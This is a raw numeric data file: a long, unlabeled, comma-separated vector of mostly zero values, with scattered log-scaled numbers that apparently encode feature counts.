0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 1.3862943611198906, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 2.772588722239781, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.5263605246161616, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 2.70805020110221, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 2.4849066497880004, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 8.215149976722676, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.649511027115099, 0, 0.0, 0, 0.0, 0.0, 2.4849066497880004, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.9512437185814275, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0, 0.0, 3.044522437723423, 1.0986122886681098, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 4.160336650881089, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 5.2237778411112, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0, 0.0, 0.0, 0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.8918202981106265, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 3.6375861597263857, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 7.16703787691222, 0.0, 0.0, 2.1972245773362196, 0.0, 0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 25.273805172346215, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.6931471805599453, 0.0, 0.0, 1.9459101490553132, 0.0, 0, 0.0, 0.0, 1.7412592803704001, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.772588722239781, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 9.899745575730817, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 10.781540614970998, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 4.969640753475787, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 3.1354942159291497, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 1.6094379124341003, 1.791759469228055, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 3.295836866004329, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.3978952727983707, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 3.58351893845611, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.4849066497880004, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.6635616461296467, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 